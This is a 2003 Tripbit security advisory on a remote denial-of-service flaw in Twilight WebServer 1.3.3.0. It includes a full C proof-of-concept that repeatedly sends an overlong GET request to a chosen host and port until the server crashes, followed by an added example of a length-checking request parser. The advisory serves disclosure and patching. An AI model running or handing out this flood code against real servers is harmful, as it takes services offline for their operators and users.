TA-2003-07 Denial of Service Attack against Twilight WebServer 1.3.3.0
contributed by: rushjo

==============================================================================
Tripbit Security Advisory
TA-2003-07 Denial of Service Attack against Twilight WebServer v1.3.3.0
==============================================================================

PROGRAM: Twilight WebServer v1.3.3.0
HOMEPAGE: http://www.twilightutilities.com
NOT VULNERABLE VERSIONS: v1.3.4.0
RISK: Medium
IMPACT: Denial of Service Attack
RELEASE DATE: 2003-07

==============================================================================
TABLE OF CONTENTS
==============================================================================

1..........................................................DESCRIPTION
2..............................................................DETAILS
3..............................................................EXPLOIT
4............................................................SOLUTIONS
5........................................................VENDOR STATUS
6..............................................................CREDITS
7...........................................................DISCLAIMER
8...........................................................REFERENCES
9.............................................................FEEDBACK

1. DESCRIPTION
==============================================================================

"We are excited to present this completely new Modem Ready Internet Web
Server supporting these terrific features.

* Installs in seconds
* Lets you INSTANTLY share pictures and files
* Modem aware
* Automates telling friends and family when you start serving
* Automatically integrates your web camera
* Allows others to send files to you
* Automatically generates web pages
* Supports file resume
* A truly unique files-sharing tool"

(This description is taken from the website of Twilight Utilities)

2. DETAILS
==============================================================================

* Remote DoS:

A security vulnerability in Twilight WebServer allows remote attackers to
crash the server by sending an overly long GET request.

3. EXPLOIT
==============================================================================

This is a proof-of-concept exploit for this buffer overflow vulnerability.

NOTE: This is for INFORMATION purposes only and not for any destructive acts!

/****************************************************************************
* Title: Denial of Service Attack against Twilight Webserver v1.3.3.0
* Author: posidron
*
* Date: 2003-07-07
* Reference: http://www.twilightutilities.com
* Version: Twilight Webserver v1.3.3.0
* Related Info: http://www.tripbit.org/advisories/twilight_advisory.txt
*
* Exploit: twilight.c
* Compile: gcc twilight.c -o twilight
*
* Tripbit Security Development
*
* Contact
* [-] Mail: posidron@tripbit.org
* [-] Web: http://www.tripbit.org
* [-] IRC: irc.euirc.net 6667 #tripbit
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41d780 in ?? ()
*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
    int sockfd;
    struct sockaddr_in srv;
    struct hostent *host;
    /* flood is a char buffer: 1037 filler bytes plus the terminating NUL.
       get and http are sized by their initializers so both are terminated. */
    char send[1052], flood[1038], get[] = "GET", http[] = "HTTP/1.0\r\n";

    /* Build the request: method, 1037 x 'A', protocol version. */
    memset(flood, 0x41, 1037);
    flood[1037] = '\0';
    strncpy(send, get, sizeof(send) - 1);
    strncat(send, flood, sizeof(send) - strlen(send) - 1);
    strncat(send, http, sizeof(send) - strlen(send) - 1);

    if (argc < 3) {
        printf("Usage: %s [target] <port>\n", argv[0]);
        exit(0);
    }

    if ((host = gethostbyname(argv[1])) == NULL) {
        printf("Unknown host!\n");
        exit(0);
    }

    srv.sin_family = AF_INET;
    srv.sin_port = htons(atoi(argv[2]));
    srv.sin_addr.s_addr = inet_addr((char *)argv[1]);

    printf("DoS against Twilight Webserver v1.3.3.0\n");

    /* Repeat the request until a write fails, i.e. the server is gone. */
    for (;;) {
        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            printf("Can't start socket()!\n");
            exit(0);
        }

        if (connect(sockfd, (struct sockaddr *)&srv, sizeof(srv)) < 0) {
            printf("Connection to server broken!\n");
            close(sockfd);
        }

        if (write(sockfd, send, strlen(send)) < 0) {
            break;
        }

        close(sockfd);
    }

    printf("Attack done!...\n");

    return 0;
}

This error causes a crash of the Twilight WebServer v1.3.3.0.

4. SOLUTIONS
==============================================================================

Upgrade your Twilight WebServer to the new fixed version v1.3.4.0. This
version is available at http://www.twilightutilities.com.

5. VENDOR STATUS
==============================================================================

The vendor has reportedly been notified. He did not answer the report, but
NOW there is a new fixed version available for download.

6. CREDITS
==============================================================================

Discovered by posidron

7. DISCLAIMER
==============================================================================

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

8. REFERENCES
==============================================================================

- Original Version: http://www.tripbit.org

9. FEEDBACK
==============================================================================

Please send suggestions, updates, and comments to:

Tripbit Security Advisory
http://www.tripbit.org
rushjo@tripbit.org
posidron@tripbit.org
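
Added example, not part of the original advisory and not the vendor's fix: a request-line parser that checks lengths before copying into fixed buffers, the kind of check whose absence lets an overly long GET request like the one described in DETAILS overrun a buffer. The limits MAX_LINE and MAX_TARGET and all function and struct names are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limits for illustration; not values taken from Twilight WebServer. */
#define MAX_LINE   512
#define MAX_TARGET 255

struct request {
    char method[8];
    char target[MAX_TARGET + 1];
};

/* Copy the token [p, end) into dst only if it fits together with its NUL. */
static int copy_token(char *dst, size_t cap, const char *p, const char *end)
{
    size_t n = (size_t)(end - p);
    if (n == 0 || n >= cap)
        return -1;
    memcpy(dst, p, n);
    dst[n] = '\0';
    return 0;
}

/* Parse "METHOD SP TARGET SP HTTP/x.y CRLF" from buf[0..len).
 * Returns an HTTP status: 200 parsed, 400 malformed, 414 too long. */
int parse_request_line(const char *buf, size_t len, struct request *out)
{
    const char *eol = memchr(buf, '\n', len);
    size_t line = eol ? (size_t)(eol - buf) : len;
    if (line > MAX_LINE)
        return 414;                  /* rejected before any copy happens */
    if (eol == NULL)
        return 400;                  /* no complete line received */
    if (line > 0 && buf[line - 1] == '\r')
        line--;
    const char *end = buf + line;
    const char *sp1 = memchr(buf, ' ', line);
    if (sp1 == NULL)
        return 400;
    const char *tgt = sp1 + 1;
    const char *sp2 = memchr(tgt, ' ', (size_t)(end - tgt));
    if (sp2 == NULL)
        return 400;
    if ((size_t)(sp2 - tgt) > MAX_TARGET)
        return 414;                  /* target would not fit out->target */
    if (copy_token(out->method, sizeof out->method, buf, sp1) < 0 ||
        copy_token(out->target, sizeof out->target, tgt, sp2) < 0)
        return 400;
    if ((size_t)(end - sp2) < 6 || memcmp(sp2 + 1, "HTTP/", 5) != 0)
        return 400;
    return 200;
}
```

A server that answers 414 or 400 here closes the connection without ever touching the fixed-size fields, so request length alone cannot corrupt memory.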